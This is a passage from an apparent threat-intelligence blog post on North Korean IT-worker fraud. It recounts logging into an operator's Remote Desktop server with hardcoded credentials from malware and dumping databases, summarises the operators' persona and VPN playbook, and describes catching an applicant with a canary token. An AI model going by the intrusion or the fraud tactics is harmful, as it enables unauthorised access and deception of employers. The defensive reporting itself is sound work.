srcset="https://substackcdn.com/image/fetch/$s_!BkvE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 424w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 848w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1272w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png" width="541" height="393.8598901098901" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1060,&quot;width&quot;:1456,&quot;resizeWidth&quot;:541,&quot;bytes&quot;:522800,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/161100611?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!BkvE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 424w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 848w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1272w, https://substackcdn.com/image/fetch/$s_!BkvE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb5db5d29-1b6f-4212-9b05-108c02ad3fbb_1590x1158.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Scanning a DPRK domain with an active RDP Service. From Interview with the Chollima Chapter I.</figcaption></figure></div><p>In my own words from the first chapter:</p><blockquote><p>&#8220;The other service running on port 7777 is <strong>Remote Desktop Protocol</strong>, which allows us to authenticate, <strong>if only we had the necessary credentials</strong>.</p><p>But that&#8217;s a story for <em>another day</em>&#8221;</p></blockquote><p><strong>That day is today</strong>, so here is the full story.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sPnU!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sPnU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 424w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 848w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1272w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png" width="596" height="339.41389728096675" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:754,&quot;width&quot;:1324,&quot;resizeWidth&quot;:596,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sPnU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 424w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 848w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1272w, https://substackcdn.com/image/fetch/$s_!sPnU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2fcd9faa-61b3-4f8e-8ee2-311d046f3bdb_1324x754.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Remote Desktop Protocol login. From Interview with the Chollima Chapter I.</figcaption></figure></div><p>I tried to tease this during my talk <strong><a href="https://docs.google.com/presentation/d/1ZaRtMHXcIa4SbP-Oe4UkSwnVq3B21eX_B2t3MjvdmeY/edit?slide=id.g370ea02c58d_0_112#slide=id.g370ea02c58d_0_112">North Korea&#8217;s Fur Shop</a></strong> at <strong><a href="https://defcon.org">DEF CON</a> 33&#8217;s <a href="https://malwarevillage.org/#events">Malware Village</a></strong>, but only a few Mexican attendees actually caught the cue and came to see me after I left the stage.</p><p>Let&#8217;s say that <strong>SWIM</strong> (<em>Someone Who Isn&#8217;t Me</em>) found numerous hardcoded credentials inside certain <strong>DPRK</strong> malware samples, all of them simple and predictable, and decided to try stuffing them into the <strong>Remote Desktop Protocol</strong> login window.</p><p>That <strong>SWIM</strong> got access after only a few attempts and ravaged through the filesystem like a<strong> <a href="https://otx.alienvault.com/pulse/6748ba726f50a8728d61068f">ferret, a pretty visible one</a></strong>, and found some tools. Some of them were classics like <strong>OtterCookie</strong>, while others were cheaply programmed <strong><a href="https://quetzal.bitso.com/p/drainers">Drainers</a></strong>, some even containing hardcoded DB credentials to remote servers, which made dumping them trivially<strong> </strong>easy.</p><p>Let&#8217;s say that <strong>SWIM</strong> also stumbled upon a weird short document, something between a homemade <em>manual</em> and a <em>set of notes</em> from one operator to himself or another on different topics:</p><ul><li><p>How to set up their online personas and emails, strangely suggesting the use of &#8220;.<em>dev</em>&#8221; or &#8220;.<em>work</em>&#8221; in their handlers,</p></li><li><p>Enforcing the use of specific VPN services (such as <strong>AstrillVPN</strong>) and residential proxies, resorting to VPS providers only as a last option,</p></li><li><p>Advising them to claim they were based in <strong>Los Angeles</strong> or <strong>Texas</strong>,</p></li><li><p>Recommending AI prompts to create &#8220;<a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi">social media posts</a>&#8221; to maintain an active online presence and build their network, and to comment on compatible job postings something like &#8220;I believe I am a good fit for this position&#8221;.</p><ul><li><p>I was able to confirm this (strange) point by looking at a DPRK&#8217;s profile latest interactions on LinkedIn, which are public.</p></li></ul></li><li><p>Sharing a list of excuses to deal with awkward social situations, such as not speaking the language of the country they pretended to be from: &#8220;tell them you left as a child because your father worked abroad&#8221;.</p></li></ul><p>Do any of these points sound familiar? If you have been following this series, probably all of them. This gave me early warning about their behaviour, and it also explains why their social media <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi">AI-slop posts</a>, handlers (&#8220;.dev&#8221;, &#8220;-work&#8221;, &#8220;-projectname&#8221;), backstories, excuses and claimed locations are always the same among all candidates. This was their playbook, kind of.</p><p>Sadly, at no point did that short document shed any light on why they run away once they are discovered and delete all their online accounts, as I see this as a standard procedure.</p><p>But adding loathing to ridiculousness, one last point caught my eye: a suggestion that &#8220;female recruiters are <em>easier to deal with</em> [<em>to fool</em>] than male recruiters&#8221;. A bold claim, considering how a woman (Sof&#237;a) caught every single one of them live on camera. One of them was even <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iii">shaking like a leaf</a> during the interview. </p><p>I&#8217;d say she was <em>not exactly</em> &#8220;easy&#8221; to deal with. Speaking of which.</p><div><hr></div><h2>Fight like a girl</h2><p>With <a href="https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/">internal intelligence on how they operate</a>, my team and I moved ahead and blocked their entire toolset: the <a href="https://gbhackers.com/north-korean-workers-linked-astrill-vpn-ip-addresses/">IP ranges of their VPN providers</a>, the <a href="https://oxylabs.io/blog/what-is-residential-proxy">residential proxies </a>they relied on, the exit nodes of their remote desktop tools, and very specific <a href="https://en.wikipedia.org/wiki/Autonomous_system_(Internet)">ASNs</a> they used. I was genuinely curious to see what they would try once they realised that <em>none of their tools or hosts could reach us anymore</em>.</p><p>I spoke with Sof&#237;a and shared a set of<a href="https://canarytokens.org"> </a><strong><a href="https://canarytokens.org">canary tokens</a></strong> with her: links, QR codes, documents and other measures that, once opened, would privately send us all sorts of information about whoever activated them. Ideal for hunting <a href="https://www.crowdstrike.com/adversaries/famous-chollima/">Chollimas</a>, <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/wagemole">Moles</a> and other vermin.</p><p>When our <em>north-cordob&#233;s</em> friend joined the call, Sof&#237;a shared one of those canaries with him under a specific pretext, and he fell for it instantly, triggering it. </p><p><em>Easy to deal with, </em>sure thing.</p><p>Now do you understand why she said, &#8220;<em>Of course he&#8217;s already gone, but we got him</em>&#8221;?</p><p>I received a notification via email about the trap being stepped on, so we started investigating.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VBX9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VBX9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 424w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 848w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 1272w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VBX9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png" width="382" height="376.07751937984494" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/08e5646a-061d-480a-af1a-19107524c634_1032x1016.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1016,&quot;width&quot;:1032,&quot;resizeWidth&quot;:382,&quot;bytes&quot;:102270,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!VBX9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 424w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 848w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 1272w, https://substackcdn.com/image/fetch/$s_!VBX9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F08e5646a-061d-480a-af1a-19107524c634_1032x1016.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>He disappeared, but not without leaving behind an interesting trace. He was using a <a href="https://en.wikipedia.org/wiki/Virtual_private_server">VPS</a> located in <strong>Japan</strong>, although some tools place it in the <strong>United States</strong>, owned by <strong>Limestone Networks</strong>. This aligns neatly with what was described in the manual: when everything else fails, they are instructed to fall back on spinning up VPS instances. Having already blocked the providers they rely on most, this appears to have been their second choice.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cwXT!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cwXT!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 424w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 848w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 1272w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cwXT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png" width="582" height="309.7870879120879" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:775,&quot;width&quot;:1456,&quot;resizeWidth&quot;:582,&quot;bytes&quot;:1575380,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/181261599?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cwXT!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 424w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 848w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 1272w, https://substackcdn.com/image/fetch/$s_!cwXT!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd6a16ef9-7555-453d-aac3-0c6143780385_2278x1212.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Analysis of the IP Address</figcaption></figure></div><p>The IP address itself is not important, even though it had no prior records across intelligence platforms, nor is the fact that they were using a VPS as a <a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>, which again, we already knew from the manual. The point, echoing what we have shown in previous articles, lies in their disastrous <a href="https://en.wikipedia.org/wiki/Operations_security">OPSEC</a> and just how gullible they are.</p><p>That last part, them being a herd of gullible pony-heads, is particularly interesting. They will believe almost anything you tell them, which is precisely how we were able to escalate from <a href="https://quetzal.bitso.com/p/interview-with-the-chollima-v">talking to them daily on Telegram/Discord</a> to<a href="https://thehackernews.com/2025/12/researchers-capture-lazarus-apts-remote.html"> observe them from the inside for months</a>. During that time, we learned a great deal from their perspective, and not only on the technical side.</p><p>One detail that has stuck with me ever since, and that might explain why <strong>Lucas did not turn on his camera this time</strong>, came from an internal chat I had. It said that if you attempt to interview with a specific company whose team has a &#8220;<em><a href="https://en.wikipedia.org/wiki/Quetzal">green dragon</a></em>&#8221;, &#8220;<em>they will record your face and post it on the internet</em>&#8221; and that was &#8220;<em>not good&#8221;</em>.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!IS1h!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!IS1h!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 424w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 848w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 1272w, https://substackcdn.com/image/fetch/$s_!IS1h!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!IS1h!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F16fc820e-2574-4e85-baf7-644bd99eddf8_1179x508.png" width="450" height="193.89312977099237" 